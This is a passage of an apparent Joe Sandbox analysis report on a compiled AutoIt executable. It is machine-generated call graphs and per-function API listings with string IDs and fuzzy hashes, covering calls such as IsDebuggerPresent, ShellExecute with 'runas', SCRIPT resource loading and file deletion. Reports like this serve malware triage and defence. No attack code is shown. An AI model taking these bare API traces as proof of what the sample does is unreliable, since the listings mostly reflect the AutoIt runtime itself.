library calls 99238->99261 99240->99227 99240->99232 99241->99196 99242->99206 99243->99206 99244->99206 99245->99206 99253 1c9fb5 LeaveCriticalSection 99246->99253 99248 1d0855 99248->99219 99249->99224 99250->99224 99251->99218 99252->99223 99253->99248 99262 1d7fd5 99254->99262 99256 1d880a 99256->99231 99257->99229 99258->99231 99259->99236 99260->99238 99261->99240 99263 1d7fe1 __alloc_osfhnd 99262->99263 99264 1d7ff7 99263->99264 99266 1d802d 99263->99266 99347 1c8d68 58 API calls __getptd_noexit 99264->99347 99273 1d809e 99266->99273 99267 1d7ffc 99348 1c8ff6 9 API calls __lseeki64 99267->99348 99270 1d8049 99349 1d8072 LeaveCriticalSection __unlock_fhandle 99270->99349 99272 1d8006 __alloc_osfhnd 99272->99256 99274 1d80be 99273->99274 99275 1c471a __wsopen_nolock 58 API calls 99274->99275 99278 1d80da 99275->99278 99276 1c9006 __invoke_watson 8 API calls 99277 1d87f0 99276->99277 99280 1d7fd5 __wsopen_helper 103 
API calls 99277->99280 99279 1d8114 99278->99279 99286 1d8137 99278->99286 99323 1d8211 99278->99323 99281 1c8d34 __lseeki64 58 API calls 99279->99281 99282 1d880a 99280->99282 99283 1d8119 99281->99283 99282->99270 99284 1c8d68 __lseeki64 58 API calls 99283->99284 99285 1d8126 99284->99285 99288 1c8ff6 __lseeki64 9 API calls 99285->99288 99287 1d81f5 99286->99287 99295 1d81d3 99286->99295 99289 1c8d34 __lseeki64 58 API calls 99287->99289 99290 1d8130 99288->99290 99291 1d81fa 99289->99291 99290->99270 99292 1c8d68 __lseeki64 58 API calls 99291->99292 99293 1d8207 99292->99293 99294 1c8ff6 __lseeki64 9 API calls 99293->99294 99294->99323 99296 1cd4d4 __alloc_osfhnd 61 API calls 99295->99296 99297 1d82a1 99296->99297 99298 1d82ce 99297->99298 99299 1d82ab 99297->99299 99300 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99298->99300 99301 1c8d34 __lseeki64 58 API calls 99299->99301 99309 1d82f0 99300->99309 99302 1d82b0 99301->99302 99304 1c8d68 __lseeki64 58 API calls 99302->99304 99303 1d836e GetFileType 99307 1d8379 GetLastError 99303->99307 99308 1d83bb 99303->99308 99306 1d82ba 99304->99306 99305 1d833c GetLastError 99310 1c8d47 __dosmaperr 58 API calls 99305->99310 99311 1c8d68 __lseeki64 58 API calls 99306->99311 99312 1c8d47 __dosmaperr 58 API calls 99307->99312 99318 1cd76a __set_osfhnd 59 API calls 99308->99318 99309->99303 99309->99305 99314 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99309->99314 99315 1d8361 99310->99315 99311->99290 99313 1d83a0 CloseHandle 99312->99313 99313->99315 99316 1d83ae 99313->99316 99317 1d8331 99314->99317 99320 1c8d68 __lseeki64 58 API calls 99315->99320 99319 1c8d68 __lseeki64 58 API calls 99316->99319 99317->99303 99317->99305 99322 1d83d9 99318->99322 99321 1d83b3 99319->99321 99320->99323 99321->99315 99324 1d8594 99322->99324 99325 1d1b11 __lseeki64_nolock 60 API calls 99322->99325 99342 1d845a 99322->99342 99323->99276 99324->99323 99326 1d8767 CloseHandle 99324->99326 99327 
1d8443 99325->99327 99328 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99326->99328 99329 1c8d34 __lseeki64 58 API calls 99327->99329 99327->99342 99331 1d878e 99328->99331 99329->99342 99330 1d10ab 70 API calls __read_nolock 99330->99342 99332 1d87c2 99331->99332 99333 1d8796 GetLastError 99331->99333 99332->99323 99334 1c8d47 __dosmaperr 58 API calls 99333->99334 99335 1d87a2 99334->99335 99338 1cd67d __free_osfhnd 59 API calls 99335->99338 99336 1d0d2d __close_nolock 61 API calls 99336->99342 99337 1d848c 99339 1d99f2 __chsize_nolock 82 API calls 99337->99339 99337->99342 99338->99332 99339->99337 99340 1cdac6 __write 78 API calls 99340->99342 99341 1d8611 99343 1d0d2d __close_nolock 61 API calls 99341->99343 99342->99324 99342->99330 99342->99336 99342->99337 99342->99340 99342->99341 99344 1d1b11 60 API calls __lseeki64_nolock 99342->99344 99345 1d8618 99343->99345 99344->99342 99346 1c8d68 __lseeki64 58 API calls 99345->99346 99346->99323 99347->99267 99348->99272 99349->99272 99351 1a4ce1 99350->99351 99352 1a4d9d LoadLibraryA 99350->99352 99351->99152 99351->99155 99352->99351 99353 1a4dae GetProcAddress 99352->99353 99353->99351 99355 1a5003 FindResourceExW 99354->99355 99357 1a5020 99354->99357 99356 1ddd5c LoadResource 99355->99356 99355->99357 99356->99357 99358 1ddd71 SizeofResource 99356->99358 99357->99161 99358->99357 99359 1ddd85 LockResource 99358->99359 99359->99357 99361 1a5054 99360->99361 99364 1dddd4 99360->99364 99366 1c5a7d 99361->99366 99363 1a5062 99363->99167 99365->99161 99367 1c5a89 __alloc_osfhnd 99366->99367 99368 1c5a9b 99367->99368 99369 1c5ac1 99367->99369 99379 1c8d68 58 API calls __getptd_noexit 99368->99379 99381 1c6e4e 99369->99381 99372 1c5aa0 99380 1c8ff6 9 API calls __lseeki64 99372->99380 99376 1c5ad6 99388 1c5af8 LeaveCriticalSection LeaveCriticalSection _fseek 99376->99388 99378 1c5aab __alloc_osfhnd 99378->99363 99379->99372 99380->99378 99382 1c6e5e 99381->99382 99383 1c6e80 EnterCriticalSection 
99381->99383 99382->99383 99384 1c6e66 99382->99384 99385 1c5ac7 99383->99385 99386 1c9e4b __lock 58 API calls 99384->99386 99387 1c59ee 83 API calls 5 library calls 99385->99387 99386->99385 99387->99376 99388->99378 99392 1c582d 99389->99392 99391 1a508e 99391->99180 99393 1c5839 __alloc_osfhnd 99392->99393 99394 1c587c 99393->99394 99395 1c5874 __alloc_osfhnd 99393->99395 99400 1c584f _memset 99393->99400 99396 1c6e4e __lock_file 59 API calls 99394->99396 99395->99391 99398 1c5882 99396->99398 99405 1c564d 99398->99405 99419 1c8d68 58 API calls __getptd_noexit 99400->99419 99401 1c5869 99420 1c8ff6 9 API calls __lseeki64 99401->99420 99408 1c5668 _memset 99405->99408 99410 1c5683 99405->99410 99406 1c5673 99517 1c8d68 58 API calls __getptd_noexit 99406->99517 99408->99406 99408->99410 99415 1c56c3 99408->99415 99421 1c58b6 LeaveCriticalSection LeaveCriticalSection _fseek 99410->99421 99412 1c57d4 _memset 99520 1c8d68 58 API calls __getptd_noexit 99412->99520 99415->99410 99415->99412 99422 1c4916 99415->99422 99429 1d10ab 99415->99429 99497 1d0df7 99415->99497 99519 1d0f18 58 API calls 3 library calls 99415->99519 99418 1c5678 99518 1c8ff6 9 API calls __lseeki64 99418->99518 99419->99401 99420->99395 99421->99395 99423 1c4935 99422->99423 99424 1c4920 99422->99424 99423->99415 99521 1c8d68 58 API calls __getptd_noexit 99424->99521 99426 1c4925 99522 1c8ff6 9 API calls __lseeki64 99426->99522 99428 1c4930 99428->99415 99430 1d10cc 99429->99430 99431 1d10e3 99429->99431 99532 1c8d34 58 API calls __getptd_noexit 99430->99532 99433 1d181b 99431->99433 99438 1d111d 99431->99438 99548 1c8d34 58 API calls __getptd_noexit 99433->99548 99435 1d10d1 99533 1c8d68 58 API calls __getptd_noexit 99435->99533 99436 1d1820 99549 1c8d68 58 API calls __getptd_noexit 99436->99549 99440 1d1125 99438->99440 99446 1d113c 99438->99446 99534 1c8d34 58 API calls __getptd_noexit 99440->99534 99441 1d1131 99550 1c8ff6 9 API calls __lseeki64 99441->99550 99442 1d10d8 99442->99415 99444 

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A3B7A
                                                            • IsDebuggerPresent.KERNEL32 ref: 001A3B8C
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,002662F8,002662E0,?,?), ref: 001A3BFD
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001B0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001A3C26,002662F8,?,?,?), ref: 001B0ACE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001A3C81
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002593F0,00000010), ref: 001DD4BC
                                                            • SetCurrentDirectoryW.KERNEL32(?,002662F8,?,?,?), ref: 001DD4F4
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00255D40,002662F8,?,?,?), ref: 001DD57A
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 001DD581
                                                              • Part of subcall function 001A3A58: GetSysColorBrush.USER32(0000000F), ref: 001A3A62
                                                              • Part of subcall function 001A3A58: LoadCursorW.USER32(00000000,00007F00), ref: 001A3A71
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(00000063), ref: 001A3A88
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(000000A4), ref: 001A3A9A
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(000000A2), ref: 001A3AAC
                                                              • Part of subcall function 001A3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001A3AD2
                                                              • Part of subcall function 001A3A58: RegisterClassExW.USER32(?), ref: 001A3B28
                                                              • Part of subcall function 001A39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001A3A15
                                                              • Part of subcall function 001A39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001A3A36
                                                              • Part of subcall function 001A39E7: ShowWindow.USER32(00000000,?,?), ref: 001A3A4A
                                                              • Part of subcall function 001A39E7: ShowWindow.USER32(00000000,?,?), ref: 001A3A53
                                                              • Part of subcall function 001A43DB: _memset.LIBCMT ref: 001A4401
                                                              • Part of subcall function 001A43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A44A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%#
                                                            • API String ID: 529118366-170307975
                                                            • Opcode ID: ba167f986ff20a35952e60641230867589e5c7e3011233b31d301ec26913608d
                                                            • Instruction ID: 6d4b4f263a8af0c7947f6a5766823bed959dfb1d7e6709555f0a9669deef3551
                                                            • Opcode Fuzzy Hash: ba167f986ff20a35952e60641230867589e5c7e3011233b31d301ec26913608d
                                                            • Instruction Fuzzy Hash: F951E638904248BECF11EBF4FC1DEED7B79AB56710F0081A6F861A21A1DBB45746CB61

                                                            Control-flow Graph

                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 001A4B2B
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • GetCurrentProcess.KERNEL32(?,0022FAEC,00000000,00000000,?), ref: 001A4BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 001A4BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 001A4C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 001A4C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 001A4C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 001A4C8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 5a6fbcdd64394b4cf78d38c2abcbb46e4649772a5c63d42eedfa6ff5aca0ad11
                                                            • Instruction ID: 166ceac563b1314433f926ef719a2bc98cc35d646627d9be0e4f378cfa65cb70
                                                            • Opcode Fuzzy Hash: 5a6fbcdd64394b4cf78d38c2abcbb46e4649772a5c63d42eedfa6ff5aca0ad11
                                                            • Instruction Fuzzy Hash: 5C91D23554ABC0DFC735CB7895511AABFE4AF6A300F484AAED0CA93B41D361E908C769

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1104 1a4fe9-1a5001 CreateStreamOnHGlobal 1105 1a5003-1a501a FindResourceExW 1104->1105 1106 1a5021-1a5026 1104->1106 1107 1ddd5c-1ddd6b LoadResource 1105->1107 1108 1a5020 1105->1108 1107->1108 1109 1ddd71-1ddd7f SizeofResource 1107->1109 1108->1106 1109->1108 1110 1ddd85-1ddd90 LockResource 1109->1110 1110->1108 1111 1ddd96-1dddb4 1110->1111 1111->1108
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001A4EEE,?,?,00000000,00000000), ref: 001A4FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001A4EEE,?,?,00000000,00000000), ref: 001A5010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F), ref: 001DDD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F), ref: 001DDD75
                                                            • LockResource.KERNEL32(001A4EEE,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F,00000000), ref: 001DDD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: e088a1a486187e351a5fb07cc78c3f4ade9cb6b0fa34a98e1e0d6b676d9e96da
                                                            • Instruction ID: ee5a40646aaf3117c9c0f03f10e5ea33dd2e9fcf9e2b5ed0fff7ee0443e47365
                                                            • Opcode Fuzzy Hash: e088a1a486187e351a5fb07cc78c3f4ade9cb6b0fa34a98e1e0d6b676d9e96da
                                                            • Instruction Fuzzy Hash: F4115E75200700BFD7318BA5ED58F6B7BBAEBCAB51F104278F90596260DB71E8018660
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dt&$Dt&$Dt&$Dt&$Variable must be of type 'Object'.
                                                            • API String ID: 0-3633352189
                                                            • Opcode ID: 8ae48457d922bfc68b1bde33f10822c0df0be543eec56ffcc854c7fc8c518ab6
                                                            • Instruction ID: c9b731294d2dd5eff88b80c224643d45e8c0a5d49ab1203796f284191a25c5ad
                                                            • Opcode Fuzzy Hash: 8ae48457d922bfc68b1bde33f10822c0df0be543eec56ffcc854c7fc8c518ab6
                                                            • Instruction Fuzzy Hash: B8A2A178A04205CFCB24CF98C484AAEB7F2FF5A314F258069E916AB351D775ED42CB91
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,001DE7C1), ref: 002046A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 002046B7
                                                            • FindClose.KERNEL32(00000000), ref: 002046C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: b080cd5c26720fba936b1fe109e81c78184b2bdd875f6434c97bb894f02b5433
                                                            • Instruction ID: c5108ef0abc9d3e9ed129b71ea0b9e86cf8815d10ba962bc9e9436302e9058f2
                                                            • Opcode Fuzzy Hash: b080cd5c26720fba936b1fe109e81c78184b2bdd875f6434c97bb894f02b5433
                                                            • Instruction Fuzzy Hash: 18E0D871820501AB8320B778FD4D4EA776C9E07335F104725F935C14E0F7B059608595
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B0BBB
                                                            • timeGetTime.WINMM ref: 001B0E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B0FB3
                                                            • TranslateMessage.USER32(?), ref: 001B0FC7
                                                            • DispatchMessageW.USER32(?), ref: 001B0FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 001B0FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 001B105A
                                                            • DestroyWindow.USER32 ref: 001B1066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001B1080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 001E52AD
                                                            • TranslateMessage.USER32(?), ref: 001E608A
                                                            • DispatchMessageW.USER32(?), ref: 001E6098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001E60AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr&$pr&$pr&$pr&
                                                            • API String ID: 4003667617-3414653626
                                                            • Opcode ID: d603500fc09813d851d7cd4eb625be5ce828888d8a1a58ac617e89e2311e4dc5
                                                            • Instruction ID: 04913ff2002df2b2a508f19b660160ebe2ce3961336e71a88f3112c36563fda0
                                                            • Opcode Fuzzy Hash: d603500fc09813d851d7cd4eb625be5ce828888d8a1a58ac617e89e2311e4dc5
                                                            • Instruction Fuzzy Hash: 21B2D470608B81DFD729DF24C894BAEB7E5BF95308F14491DF45A872A1DB70E884CB92

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 002091E9: __time64.LIBCMT ref: 002091F3
                                                              • Part of subcall function 001A5045: _fseek.LIBCMT ref: 001A505D
                                                            • __wsplitpath.LIBCMT ref: 002094BE
                                                              • Part of subcall function 001C432E: __wsplitpath_helper.LIBCMT ref: 001C436E
                                                            • _wcscpy.LIBCMT ref: 002094D1
                                                            • _wcscat.LIBCMT ref: 002094E4
                                                            • __wsplitpath.LIBCMT ref: 00209509
                                                            • _wcscat.LIBCMT ref: 0020951F
                                                            • _wcscat.LIBCMT ref: 00209532
                                                              • Part of subcall function 0020922F: _memmove.LIBCMT ref: 00209268
                                                              • Part of subcall function 0020922F: _memmove.LIBCMT ref: 00209277
                                                            • _wcscmp.LIBCMT ref: 00209479
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AAE
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002096DC
                                                            • _wcsncpy.LIBCMT ref: 0020974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00209785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0020979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002097AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002097BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 5fb0f2873a833529d59dc7729608fc0083b54d12766f12e1e0effbfbd117ffbc
                                                            • Instruction ID: b0d6c25c0cc92a0dea2e99e33ed4b0c6f5b6ab6f4c17653dda12b19b0b54d6a0
                                                            • Opcode Fuzzy Hash: 5fb0f2873a833529d59dc7729608fc0083b54d12766f12e1e0effbfbd117ffbc
                                                            • Instruction Fuzzy Hash: 09C14DB1D10219ABCF21DF94CD85EDEB7BDAF55300F0040AAF609E7192DB709A948F65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                            • RegisterClassExW.USER32(00000030), ref: 001A309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                            • LoadIconW.USER32(000000A9), ref: 001A30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 3fac4f14d5200589a06f2f0027360dbc57721fa9cf091b7df2bf469329a919c0
                                                            • Instruction ID: 81e07ffe4eb9836f42263d185602c9004663e7ce6fe79d4de78e5a7fc2f376f9
                                                            • Opcode Fuzzy Hash: 3fac4f14d5200589a06f2f0027360dbc57721fa9cf091b7df2bf469329a919c0
                                                            • Instruction Fuzzy Hash: 4A3138B1840349AFDB908FE4E988ACDBBF0FB09310F10852AE580E62A1D3B94585CF51

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                            • RegisterClassExW.USER32(00000030), ref: 001A309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                            • LoadIconW.USER32(000000A9), ref: 001A30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: e5f446097bbba57ecda1f405e8cf3b62961ee34f6698b27aaf0dedc64234aedb
                                                            • Instruction ID: e387265725edf8ff8e84b4d83fdbf269697ecbc84caa8293b35164face2ce64c
                                                            • Opcode Fuzzy Hash: e5f446097bbba57ecda1f405e8cf3b62961ee34f6698b27aaf0dedc64234aedb
                                                            • Instruction Fuzzy Hash: A221BFB1950218BFDB50DFE4FA8DB9DBBF4FB08700F10922AFA10A62A0D7B545458F95

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001A4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002662F8,?,001A37C0,?), ref: 001A4882
                                                              • Part of subcall function 001C074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001A72C5), ref: 001C0771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001A7308
